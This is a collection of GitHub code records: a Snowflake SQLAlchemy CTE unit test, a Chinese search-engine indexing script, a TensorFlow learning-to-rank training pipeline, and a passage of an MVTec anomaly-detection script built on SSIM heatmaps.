+{"seq_id":"33012647621","text":"def test_cte():\n    from datetime import date\n\n    from sqlalchemy import Column, Date, Integer, MetaData, Table, literal, select\n\n    from snowflake.sqlalchemy import snowdialect\n\n    metadata = MetaData()\n    visitors = Table(\n        \"visitors\",\n        metadata,\n        Column(\"product_id\", Integer),\n        Column(\"date1\", Date),\n        Column(\"count\", Integer),\n    )\n    product_id = 1\n    day = date.today()\n    count = 5\n    with_bar = select(literal(product_id), literal(day), literal(count)).cte(\"bar\")\n    sel = select(with_bar)\n    ins = visitors.insert().from_select(\n        [visitors.c.product_id, visitors.c.date1, visitors.c.count], sel\n    )\n    assert str(ins.compile(dialect=snowdialect.dialect())) == (\n        \"INSERT INTO visitors (product_id, date1, count) WITH bar AS \\n\"\n        \"(SELECT %(param_1)s AS anon_1, %(param_2)s AS anon_2, %(param_3)s AS anon_3)\\n\"\n        \" SELECT bar.anon_1, bar.anon_2, bar.anon_3 \\n\"\n        \"FROM bar\"\n    
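# the Snowflake dialect renders the WITH clause after the INSERT column list\n    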
)\n","repo_name":"snowflakedb/snowflake-sqlalchemy","sub_path":"tests/test_unit_cte.py","file_name":"test_unit_cte.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"72"} +{"seq_id":"1314018396","text":"from whoosh.index import create_in\r\nfrom whoosh.fields import *\r\nfrom jieba.analyse import ChineseAnalyzer\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom collections import defaultdict\r\nimport pickle\r\nimport jieba\r\nfrom whoosh.index import open_dir\r\nimport numpy as np\r\n\r\nclass Index:\r\n url_all=set()# url集合\r\n url_anchor_dict=defaultdict()#url对应的锚文本\r\n url_relatedurl_dict=defaultdict(list)# url与指向的其他url的映射\r\n url_content_dict=defaultdict()#url对应的文本内容\r\n url_id_dict=defaultdict()# url到id的映射\r\n id_url_dict=defaultdict()#id到url的映射\r\n url_all_content_dict=defaultdict() #url相关的所有内容\r\n url_title_dict=defaultdict() #保存url的title\r\n url_docvector_dict=defaultdict()#url对应的文档向量\r\n url_vectorlen_dict=defaultdict()#url对应的文档向量的长度\r\n url_pagerank_dict=defaultdict() #保存url的pagerank值\r\n ix=None #索引\r\n data_dir=\"./data/\"\r\n tfidfVectorizer=None #tfidf模型\r\n \r\n def __init__(self):\r\n self.ix= open_dir('./index')\r\n with open(self.data_dir+\"url\",\"rb\") as f:\r\n self.url_all=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_anchor_dict.txt\",\"rb\") as f:\r\n self.url_anchor_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_relatedurl_dict.txt\",\"rb\") as f:\r\n self.url_relatedurl_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_content_dict\",\"rb\") as f:\r\n self.url_content_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_id_dict\",\"rb\") as f:\r\n self.url_id_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"id_url_dict.txt\",\"rb\") as f:\r\n self.id_url_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_title_dict\",\"rb\") as f:\r\n self.url_title_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_pagerank_dict.txt\",\"rb\")as f:\r\n self.url_pagerank_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_all_content_dict.txt\",\"rb\")as f:\r\n self.url_all_content_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_docvector_dict.txt\",\"rb\")as f:\r\n self.url_docvector_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_vectorlen_dict.txt\",\"rb\")as f:\r\n self.url_vectorlen_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"tfidfVectorizer.txt\",\"rb\")as f:\r\n self.tfidfVectorizer=pickle.load(f)\r\n f.close()\r\n\r\n #建立索引\r\n def create_index(self):\r\n # 创建schema, stored为True表示能够被检索\r\n schema = Schema(urlid=NUMERIC(stored=True),\r\n content=TEXT(stored=True, analyzer=ChineseAnalyzer())\r\n )\r\n # 存储schema信息至indexdir目录\r\n indexdir = './index/'\r\n self.ix = create_in(indexdir, schema)\r\n # 按照schema定义信息,增加需要建立索引的文档\r\n writer = self.ix.writer()\r\n for urlid in self.url_all_content_dict.keys():\r\n all_content = self.url_all_content_dict[urlid]\r\n writer.add_document(urlid=urlid,content=all_content)\r\n writer.commit()\r\n \r\n #查询\r\n def query(self):\r\n # 创建一个检索器\r\n searcher = self.ix.searcher()\r\n while(1):\r\n sentence=input(\"请输入要查询的内容:\")\r\n if sentence==\"close\":\r\n break\r\n results = searcher.find(\"content\", sentence,limit=None)\r\n print('一共发现%d份文档:' % len(results))\r\n best_result=self.result_rank(results,sentence) #评分\r\n #输出排名前十的答案\r\n for i in 
range(0,min(15,len(best_result))):\r\n result_id=best_result[i][0]\r\n result_url=self.id_url_dict[result_id]\r\n print(result_url)\r\n \r\n #结巴分词\r\n def get_words_jieba(self,text):\r\n words_after_jieba=jieba.cut(text,cut_all=False)\r\n return words_after_jieba\r\n \r\n #结果排序\r\n def result_rank(self,results,sentence):\r\n sentence_array=self.query_vector(sentence)\r\n url_value={}\r\n #综合考虑向量模型和pagerank\r\n for i in range(len(results)):\r\n id=(results[i].fields())[u\"urlid\"]\r\n url_docv=self.url_docvector_dict[id]\r\n length=self.url_vectorlen_dict[id]\r\n cos=np.sum(url_docv*sentence_array)/length\r\n url_value[id]=cos+self.url_pagerank_dict[id] #向量模型夹角+pagerank的值\r\n url_value=sorted(url_value.items(), key=lambda item:item[1], reverse=True)\r\n return url_value\r\n \r\n #查询词的向量\r\n def query_vector(self,sentence):\r\n sentence_after_jieba=self.get_words_jieba(sentence)\r\n sentence_t=self.tfidfVectorizer.transform(sentence_after_jieba)\r\n sentence_array=sentence_t.toarray()\r\n return sentence_array\r\n\r\nif __name__=='__main__':\r\n index=Index()\r\n #index.create_index()\r\n index.query()","repo_name":"tolstoy-yun/Search-Engines_NKU","sub_path":"index_query.py","file_name":"index_query.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20784259912","text":"from mt.data.dataset.callbacks.tokenizer_callback import TokenizerCallback\nfrom mt.data.dataset.callbacks.feature_callbacks import FeatureMerger, NormalizeAlongAxis, LayoutEncoder, FeatureTransformationCallback\nfrom mt.data.dataset.parser import SeqExampleParser, ExampleParser\nfrom mt.data.dataset.sampler import SequenceExampleSampler\nfrom mt.data.dataset.utils import concat_from_zipped_datasets, SampleWeighter, has_positives_and_negatives, calc_label_distribution\nfrom mt.data.utils import get_blocklist\n\nfrom mt.models.lse.encoder import DSSM, AttnDSSM, USE\nfrom mt.models.ltr import espec, espec_val, cspec\nfrom mt.models.ltr.attnrank import AttnRank\nfrom mt.models.ltr.mlp import MLPRank\nfrom mt.models.ltr.drmm import DHRMM\nfrom mt.models.ltr.knrm import HybridKNRM\nfrom mt.models.model_io import s3_get_keras_model\nfrom mt.models.callbacks import TransformerLRSchedule, SaveCallback\n\nfrom mt.models.ultr.joe import JointEstimator\nfrom mt.tokenizer.tokenizer_io import load_bert_tokenizer_from_vocab_path, get_vocab_from_s3\nfrom mt.utils import ensure_url_format\nfrom mt.config import config\n\nimport tensorflow as tf\nimport tensorflow.keras as nn\n\nfrom abc import ABC, abstractmethod\nfrom typing import Union\nfrom dataclasses import dataclass\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom mt.evaluation.utils.inspection_utils import prepare_tokens_for_print\nimport warnings\n\n\n@dataclass\nclass PipelineConfig:\n num_negatives: int\n random_negatives: int\n list_size: int\n num_tasks: int\n epochs: int\n batch_size: int\n learning_rate: Union[float, nn.optimizers.schedules.LearningRateSchedule]\n sampling_weight_col: str = None\n sample_w_replacement: bool = False\n normalize_input: bool = False\n val_metric_to_monitor: str = \"val_loss\"\n loss_weights: dict=None\n\n @property\n def mode(self):\n if self.val_metric_to_monitor == \"val_loss\":\n return \"min\"\n else:\n return \"max\"\n\n\nclass BasePipeline(ABC):\n\n def __init__(self,\n model_url,\n vocab_url, \n pbk_url,\n pipeline_config: PipelineConfig,\n ) -> None:\n\n self.pipeline_config = pipeline_config\n\n self.tokenizer, 
self.vocab = load_bert_tokenizer_from_vocab_path(vocab_url, return_vocab=True)\n        self.pbks = get_vocab_from_s3(pbk_url)\n        self.pbk_lookup = tf.keras.layers.StringLookup(vocabulary=self.pbks)\n\n        self.model_url = ensure_url_format(model_url)\n\n        self.tokenizer_callback = self.get_tokenizer()\n\n\n    def get_tokenizer(self):\n        \n        if not config.MAX_TOKENS:\n            seq_length=None\n        else:\n            seq_length={config.QUERY_COL: config.MAX_TOKENS, \n                        config.PRODUCT_TITLE_COL: config.MAX_TOKENS}\n\n        tokenizer_callback = TokenizerCallback(tokenizer=self.tokenizer, \n                                               cols=[config.QUERY_COL, config.PRODUCT_TITLE_COL],\n                                               max_length=seq_length)\n\n        return tokenizer_callback\n\n    @abstractmethod \n    def training_dataset(self, train_path):\n        pass\n\n    @abstractmethod \n    def validation_dataset(self, val_path):\n        pass\n\n    @abstractmethod\n    def get_model(self, name, *args, **kwargs):\n        pass\n\n    @abstractmethod\n    def start(self, callbacks, **kwargs):\n        pass\n\n\nclass BaseEncoderPipeline(BasePipeline):\n\n    def __init__(self, \n                 model_url, \n                 encoder_name,\n                 vocab_url, \n                 pbk_url, \n                 pipeline_config: PipelineConfig, \n                 embedder_name=None) -> None:\n\n        super().__init__(model_url, vocab_url, pbk_url, pipeline_config)\n\n        self.encoder, self.optimizer = self.get_model(encoder_name, pipeline_config.learning_rate)\n\n    def get_model(self, name, learning_rate):\n\n        def get_use():\n            d_model = 256\n            encoder = USE(len(self.vocab), embedding_dim=d_model, dff=1024, num_attn_heads=4,\n                          num_attn_layers=2, dropout_rate=0.1)\n            learning_rate = TransformerLRSchedule(d_model)\n            optimizer = tf.keras.optimizers.Adam(\n                learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\n            return encoder, optimizer\n\n        def get_dssm():\n            encoder = DSSM(len(self.vocab), embedding_dim=300, dense_layer_nodes=[300, 300],\n                           batch_norm=True, dropout_rate=0.3)\n\n            optimizer = nn.optimizers.Adam(learning_rate=learning_rate, clipnorm=3.0)\n            return encoder, optimizer\n\n        def get_dssm_w_attn():\n            encoder = AttnDSSM(len(self.vocab), embedding_dim=300, sentence_emb_dim=128)\n            optimizer = nn.optimizers.Adam(learning_rate=learning_rate, clipnorm=3.0)\n            return encoder, optimizer\n\n        if name == \"dssm\":\n            encoder, optimizer = get_dssm()\n        elif name == \"use\":\n            encoder, optimizer = get_use()\n        elif name == \"dssm_w_attn\":\n            encoder, optimizer = get_dssm_w_attn()\n\n        return encoder, optimizer\n\n\nclass BaseLTRPipeline(BasePipeline):\n\n    def __init__(self, \n                 model_url, \n                 vocab_url, \n                 pbk_url, \n                 pipeline_config: PipelineConfig, \n                 encoder_name=None, \n                 classifier_name=None, \n                 embedder_name=None) -> None:\n\n        super().__init__(model_url, vocab_url, pbk_url, pipeline_config)\n\n        if encoder_name:\n            self.encoder = s3_get_keras_model(encoder_name, self.model_url)\n\n        if classifier_name:\n            self.pbk_classifier = s3_get_keras_model(classifier_name, self.model_url)\n\n        if embedder_name:\n            embedder = s3_get_keras_model(embedder_name, self.model_url)\n            self.embedding_layer = embedder.embedding_layer\n        else:\n            self.embedding_layer = None\n\n        self.feature_merger = FeatureMerger(config.MERGE_COLS, merged_feature_name=config.NUMERIC_FEATURES_COL)\n\n        self.sequence_parser = SeqExampleParser(espec, cspec, list_size=self.pipeline_config.list_size)\n\n        if self.pipeline_config.normalize_input:\n            warnings.warn(\"input normalization is activated\")\n            self.normalize_num_features = NormalizeAlongAxis(column=config.NUMERIC_FEATURES_COL, axis=[0,1], mask_value=-1, kind=\"z_norm\")\n        elif self.pipeline_config.num_negatives == -1:\n            warnings.warn(\"\"\"input is not normalized, however no sampling is performed. 
\n This can lead to numerical issues, since BatchNormalization will not take \n into account the masking!\"\"\")\n\n # NOTE 72 should be enough for validation set\n self.sequence_parser_val = SeqExampleParser(espec_val, cspec, list_size=config.MAX_SEQ_LENGTH)\n\n self.example_parser = ExampleParser(espec)\n\n self.sampler = SequenceExampleSampler(num_negatives=self.pipeline_config.num_negatives, \n replacement=self.pipeline_config.sample_w_replacement,\n sample_weight=self.pipeline_config.sampling_weight_col)\n\n self.feature_transformer = self.get_feature_transformer()\n self.layout_encoder = self.get_layout_encoder()\n\n self.sample_weighter = SampleWeighter(self.pipeline_config.num_tasks, self.pipeline_config.loss_weights)\n\n\n def get_feature_transformer(self):\n\n feature_transformations1 = {\n k: lambda x: tf.where(tf.not_equal(x, -1),\n tf.math.log1p(tf.maximum(0.0, tf.cast(x, tf.float32))), \n tf.cast(x, tf.float32))\n for k in config.LOG1P_TRANSFORM_COLS\n }\n\n feature_transformations2 = {k: lambda x: tf.expand_dims(x, -1) for k in config.NUMERICAL_COLUMNS}\n\n one_hot_transformation = []\n for k,v in config.CATEGORICAL_FEATURES.items():\n lookup = tf.keras.layers.StringLookup(vocabulary=v)\n transformation = {k: lambda x: tf.one_hot(lookup(x)-1, len(v))}\n one_hot_transformation.append(transformation)\n\n transform_callback = FeatureTransformationCallback(column_operation_mappings=[feature_transformations1,\n feature_transformations2,\n *one_hot_transformation])\n return transform_callback\n\n\n def get_layout_encoder(self):\n device_lookup = tf.keras.layers.StringLookup(vocabulary=config.DEVICE_VOCAB)\n layout_lookup = tf.keras.layers.StringLookup(vocabulary=config.LAYOUT_VOCAB)\n\n layout_kwargs = {\"interaction_cols\": None,\n \"merge_cols\": config.POSITION_BIAS_FEATURES,\n \"column_operation_mapping\": {\n # position starts with one, hence subtract by one, since one_hot_expects values starting from 0\n config.POSITION_COL: lambda x: tf.one_hot(tf.cast(x-1, tf.int64), config.MAX_SEQ_LENGTH),\n config.DEVICE_COL: lambda x: tf.one_hot(device_lookup(x)-1, len(config.DEVICE_VOCAB)),\n config.LAYOUT_COL: lambda x: tf.one_hot(\n layout_lookup(x)-1, len(config.LAYOUT_VOCAB))\n },\n \"feature_name\": config.POS_BIAS_FEATURE_COL}\n\n layout_encoder = LayoutEncoder(**layout_kwargs)\n\n return layout_encoder\n\n def get_model(self, name, **kwargs):\n\n def get_attnrank():\n attnrank = AttnRank(self.encoder,\n classifier=self.pbk_classifier,\n pbks=self.pbks,\n embedding_layer=self.embedding_layer,\n num_tasks=self.pipeline_config.num_tasks,\n **kwargs) # .build_graph() # NOTE: build_graph is important as it ensures dynamic shape after loading\n return attnrank\n\n def get_mlp():\n mlp = MLPRank(self.encoder,\n classifier=self.pbk_classifier,\n pbks=self.pbks,\n num_tasks=self.pipeline_config.num_tasks,\n **kwargs) # NOTE: build_graph should be implemented\n return mlp\n\n def get_drmm():\n drmm = DHRMM(self.encoder.embedding_layer,\n pbk_classifier=self.pbk_classifier, \n pbks=self.pbks, \n **kwargs) # NOTE: build_graph should be implemented\n return drmm\n\n def get_knrm():\n drmm = HybridKNRM(self.encoder.embedding_layer,\n pbk_classifier=self.pbk_classifier, \n pbks=self.pbks, \n **kwargs) # NOTE: build_graph should be implemented\n return drmm\n\n if name == \"attnrank\":\n ranker = get_attnrank()\n elif name == \"mlp\":\n ranker = get_mlp()\n elif name == \"drmm\":\n ranker = get_drmm() \n elif name == \"knrm\":\n ranker = get_knrm()\n return ranker\n\n @abstractmethod \n def 
training_dataset(self, *args, **kwargs):\n pass\n\n @abstractmethod \n def validation_dataset(self, *args, **kwargs):\n pass\n\n\nclass LTRPipeline(BaseLTRPipeline):\n def __init__(self,\n model_url, \n vocab_url, \n pbk_url, \n pipeline_config: PipelineConfig, \n encoder_name=None, \n classifier_name=None, \n embedder_name=None) -> None:\n super().__init__(model_url=model_url,\n encoder_name=encoder_name,\n classifier_name=classifier_name,\n vocab_url=vocab_url, pbk_url=pbk_url,\n pipeline_config=pipeline_config,\n embedder_name=embedder_name)\n\n\n def training_dataset(self, *args, **kwargs):\n if self.pipeline_config.random_negatives > 0:\n return self._training_dataset_w_additional_negatives(*args, **kwargs)\n else:\n return self._training_dataset(*args, **kwargs)\n\n def validation_dataset(self):\n \n normalize_judgements = NormalizeAlongAxis(column=config.JUDGEMENT_COL,\n axis=1, mask_value=-1, kind=\"min_max\")\n\n ds_val = (tf.data.Dataset.list_files(\"training_data/val/*.tfrecord\")\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .shuffle(10_000)\n .batch(50)\n .map(self.sequence_parser_val, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.tokenizer_callback, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_transformer, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_merger, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.layout_encoder, num_parallel_calls=tf.data.AUTOTUNE)\n .map(normalize_judgements, num_parallel_calls=tf.data.AUTOTUNE)\n .map(calc_label_distribution, num_parallel_calls=tf.data.AUTOTUNE))\n\n if hasattr(self, \"normalize_num_features\"):\n # add the normalization callback if it exists\n ds_val = ds_val.map(self.normalize_num_features,\n num_parallel_calls=tf.data.AUTOTUNE)\n\n return ds_val\n\n\n def _training_dataset(self):\n \n ds = (tf.data.Dataset.list_files(\"training_data/train/*.tfrecord\", shuffle=True)\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .shuffle(100_000)\n .batch(self.pipeline_config.batch_size)\n .map(self.sequence_parser, num_parallel_calls=tf.data.AUTOTUNE))\n\n if self.pipeline_config.num_negatives != -1:\n # if we sample a positive along with several negatives, we need to make sure \n # that there are actually positive and negative examples in the sequence\n ds = (ds.unbatch()\n .filter(has_positives_and_negatives)\n .batch(self.pipeline_config.batch_size))\n\n ds = (ds.map(self.sampler, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.tokenizer_callback, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.sample_weighter, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_transformer, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_merger, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.layout_encoder, num_parallel_calls=tf.data.AUTOTUNE)\n .map(calc_label_distribution, num_parallel_calls=tf.data.AUTOTUNE))\n\n if hasattr(self, \"normalize_num_features\"):\n # add the normalization callback if it exists\n ds = ds.map(self.normalize_num_features,\n num_parallel_calls=tf.data.AUTOTUNE)\n\n return ds.prefetch(tf.data.AUTOTUNE)\n\n def _training_dataset_w_additional_negatives(self):\n # sample random negatives\n ds_negs = (tf.data.Dataset.list_files(\"click/train/*.tfrecord\", shuffle=True)\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .shuffle(1_000_000)\n .map(self.example_parser, num_parallel_calls=tf.data.AUTOTUNE)\n .batch(self.pipeline_config.random_negatives))\n\n ds = 
(tf.data.Dataset.list_files(\"training_data/train/*.tfrecord\", shuffle=True)\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .shuffle(100_000)\n .batch(self.pipeline_config.batch_size)\n .map(self.sequence_parser, num_parallel_calls=tf.data.AUTOTUNE))\n\n if self.pipeline_config.num_negatives != -1:\n # if we sample a positive along with several negatives, we need to make sure \n # that there are actually positive and negative examples in the sequence\n ds = (ds.unbatch()\n .filter(has_positives_and_negatives)\n .batch(self.pipeline_config.batch_size))\n\n ds_zip = (tf.data.Dataset.zip((ds, ds_negs))\n .map(concat_from_zipped_datasets, num_parallel_calls=tf.data.AUTOTUNE)\n #.map(string_to_number, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.sampler, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.tokenizer_callback, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.sample_weighter, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_transformer, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_merger, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.layout_encoder, num_parallel_calls=tf.data.AUTOTUNE)\n .map(calc_label_distribution, num_parallel_calls=tf.data.AUTOTUNE))\n\n if hasattr(self, \"normalize_num_features\"):\n # add the normalization callback if it exists\n ds_zip = ds_zip.map(self.normalize_num_features,\n num_parallel_calls=tf.data.AUTOTUNE)\n\n return ds_zip.prefetch(tf.data.AUTOTUNE)\n\n\n def start(self, estimator, callbacks:list=None, train_steps=None, validation_steps=None):\n\n save_ranker = SaveCallback(estimator.ranker.name,\n model_attribute=\"ranker\",\n model_name=estimator.ranker.name,\n s3_path=self.model_url,\n verbose=1,\n save_best_only=True,\n monitor=self.pipeline_config.val_metric_to_monitor,\n mode=self.pipeline_config.mode)\n\n save_bias_model = SaveCallback(estimator.propensity_estimator.name,\n model_attribute=\"propensity_estimator\",\n model_name=estimator.propensity_estimator.name,\n s3_path=self.model_url,\n verbose=0,\n save_best_only=True,\n monitor=self.pipeline_config.val_metric_to_monitor,\n mode=self.pipeline_config.mode)\n \n\n if not callbacks:\n callbacks = [save_ranker, save_bias_model]\n else:\n callbacks.append(save_ranker)\n callbacks.append(save_bias_model)\n\n train_ds = self.training_dataset()\n if train_steps:\n train_ds = train_ds.take(train_steps)\n val_ds = self.validation_dataset()\n if validation_steps:\n val_ds = val_ds.take(validation_steps).cache()\n\n return estimator.fit(train_ds, validation_data=val_ds, epochs=self.pipeline_config.epochs, callbacks=callbacks)\n\n\n def top5k_dataset(self):\n eval_espec = espec.copy()\n eval_espec = {k:v for k,v in eval_espec.items() if k in config.RANKER_FEATURES + [config.OFFER_OR_PRODUCT_COL]}\n eval_cspec = cspec.copy()\n eval_cspec[\"searchterm_normalized\"] = eval_cspec.get(\"searchterm\")\n eval_parser = SeqExampleParser(eval_espec, eval_cspec)\n\n ds_top5k = (tf.data.Dataset.list_files(\"top5k/*.tfrecord\")\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .map(eval_parser, num_parallel_calls=tf.data.AUTOTUNE)\n .batch(1)\n #.map(string_to_number, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.tokenizer_callback, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_transformer, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_merger, num_parallel_calls=tf.data.AUTOTUNE))\n\n if hasattr(self, \"normalize_num_features\"):\n ds_top5k = ds_top5k.map(self.normalize_num_features, 
num_parallel_calls=tf.data.AUTOTUNE)\n\n return ds_top5k\n\n def get_5k_rankings(self, ranker, weights=None):\n\n ds_top5k = self.top5k_dataset()\n\n block_list = get_blocklist(config.BLOCKLIST_PATH)\n queries_with_distorting_retrievals = [\"pc set komplett\", \"pc set komplett com\", \"komplett pc set\"]\n\n dfs = []\n for x in tqdm(iter(ds_top5k)):\n\n query_normalized = x[config.NORMALIZED_QUERY_COL][0].numpy().decode(\"utf-8\")\n \n if query_normalized in block_list:\n continue\n \n query = prepare_tokens_for_print(x[config.QUERY_COL], self.tokenizer)[0]\n \n if query in queries_with_distorting_retrievals:\n continue\n\n if hasattr(ranker, \"input_signature\"):\n inputs = {k: v for k,v in x.items() if k in ranker.input_signature.keys()}\n else:\n inputs = x \n\n pred = ranker.predict(inputs, verbose=0)\n\n if isinstance(pred, list):\n if not weights:\n weights = [1] * len(pred)\n pred = tf.add_n([weights[i] * pred[i] for i in range(len(pred))])\n\n pred = pred[0]\n docs = prepare_tokens_for_print(x[config.PRODUCT_TITLE_COL][0], self.tokenizer)\n pids = x[config.OFFER_OR_PRODUCT_COL][0]\n pids = [p.decode(\"utf-8\") for p in pids.numpy()]\n\n df = pd.DataFrame({\n \"query\": query_normalized,\n \"offer_or_product_id\": pids,\n \"title\": docs,\n \"score\": pred\n })\n\n dfs.append(df)\n \n merged_df = pd.concat(dfs, ignore_index=True)\n\n df_agg = merged_df.groupby([\"query\", \"offer_or_product_id\"]).agg({\"score\": np.max, \"title\":lambda x: x.iloc[0]})\n df_sorted = df_agg.sort_values([\"query\", \"score\"], ascending=False)\n final_df = df_sorted.reset_index()\n if weights is not None:\n final_df.to_csv(f\"5k_{ranker.name}_{'_'.join([str(x) for x in weights])}_weights.csv\")\n else:\n final_df.to_csv(f\"5k_{ranker.name}.csv\")\n\n return merged_df\n","repo_name":"LTluttmann/unbiased_neural_ranking","sub_path":"mt/run/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":22566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13105531273","text":"import os\nimport numpy\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import auc\nfrom sklearn import metrics\nfrom pytorch_msssim_residual_map import ms_ssim, ssim\n\nfrom ssim_module import *\nfrom ssim_module_256 import twoin1Generator as twoin1Generator256\n\nfrom mvtec_data_loader import MvtecDataLoader, DualDataLoader\nimport torch\nimport torchvision\n# import Helper\n\ntorch.cuda.empty_cache()\ncuda_dev = \"cuda:1\"\ndevice = torch.device(cuda_dev)\nprint(\">> Device Info: {} is in use\".format(torch.cuda.get_device_name(0)))\n\nsaver_count = 0\n\nBATCH_SIZE = 1\n############################ Parameters ############################\nlatent_dimension = 128\ncriterion = torch.nn.MSELoss()\nl1_criterion = torch.nn.L1Loss()\n\ndef rgb2gray(rgb):\n return numpy.dot(rgb[..., :3], [0.2989, 0.5870, 0.1140])\n\nclass Upsample(nn.Module):\n def __init__(self, scale_factor):\n super(Upsample, self).__init__()\n self.scale_factor = scale_factor\n def forward(self, x):\n return F.interpolate(x, scale_factor=self.scale_factor)\n\ndef heat_map_printer(ms_ssim_l1, img_whole, mask, threshold=None, plot=False):\n t1 = ms_ssim_l1.reshape(1, 225, 3 * 32 * 32)\n t2 = t1.permute(0, 2, 1)\n img_assem = torch.nn.functional.fold(t2, 256, 32, stride=16)\n np_grid_image = img_assem.squeeze(0).cpu().detach().numpy()\n heat_img = numpy.transpose(np_grid_image, (1, 2, 0)).squeeze().astype(numpy.float32)\n heatmap = rgb2gray(heat_img)\n\n if plot:\n grid_image = 
torchvision.utils.make_grid(img_whole, normalize=True, nrow=1, padding=0)\n np_grid_image = grid_image.cpu().detach().numpy()\n org_img = numpy.transpose(np_grid_image, (1, 2, 0)).squeeze().astype(numpy.float32)\n plt.imshow(org_img)\n # plt.colorbar()\n plt.axis('off')\n plt.savefig(\"../HEATMAP/org.png\")\n\n grid_image = torchvision.utils.make_grid(mask, normalize=True, nrow=1, padding=0)\n np_grid_image = grid_image.cpu().detach().numpy()\n heat_img = numpy.transpose(np_grid_image, (1, 2, 0)).squeeze().astype(numpy.float32)\n plt.imshow(heat_img)\n plt.axis('off')\n plt.savefig(\"../HEATMAP/mask.png\")\n\n return heatmap\n\n\n\n\n\ncategory = {\n 1: \"bottle\",\n 2: \"hazelnut\",\n 3: \"capsule\",\n 4: \"metal_nut\",\n 5: \"leather\",\n 6: \"pill\",\n 7: \"wood\",\n 8: \"carpet\",\n 9: \"tile\",\n 10: \"grid\",\n 11: \"cable\",\n 12: \"transistor\",\n 13: \"toothbrush\",\n 14: \"screw\",\n 15: \"zipper\"\n }\n\n\n# ####################################################################\n\ndef load_train(train_path):\n transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n # torchvision.transforms.Grayscale(num_output_channels=3),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n imagenet_data = MvtecDataLoader(train_path, transform=transform)\n # imagenet_data = torchvision.datasets.ImageFolder(test_path, transform=transform)\n\n train_data_loader = torch.utils.data.DataLoader(imagenet_data,\n batch_size=BATCH_SIZE,\n num_workers=6,\n pin_memory=True)\n return train_data_loader\n\n\ndef load_test(test_path):\n transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n # torchvision.transforms.Grayscale(num_output_channels=3),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n imagenet_data = MvtecDataLoader(test_path, transform=transform)\n # imagenet_data = torchvision.datasets.ImageFolder(test_path, transform=transform)\n\n test_data_loader = torch.utils.data.DataLoader(imagenet_data,\n batch_size=BATCH_SIZE,\n num_workers=6,\n pin_memory=True)\n return test_data_loader\n\n\ndef load_test_and_mask(test_path, mask_path):\n test_transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n # torchvision.transforms.Grayscale(num_output_channels=3),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n mask_transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n torchvision.transforms.ToTensor(),\n ])\n imagenet_data = DualDataLoader(test_path, mask_path, test_transform, mask_transform)\n # imagenet_data = torchvision.datasets.ImageFolder(test_path, transform=transform)\n\n test_mask_data_loader = torch.utils.data.DataLoader(imagenet_data,\n batch_size=BATCH_SIZE,\n num_workers=0,\n pin_memory=True)\n return test_mask_data_loader\n\n\ndef load_vaild(vaild_path):\n transform = torchvision.transforms.Compose([\n torchvision.transforms.Resize(256),\n # torchvision.transforms.Grayscale(num_output_channels=3),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n imagenet_data = MvtecDataLoader(vaild_path, transform=transform)\n # imagenet_data = torchvision.datasets.ImageFolder(test_path, 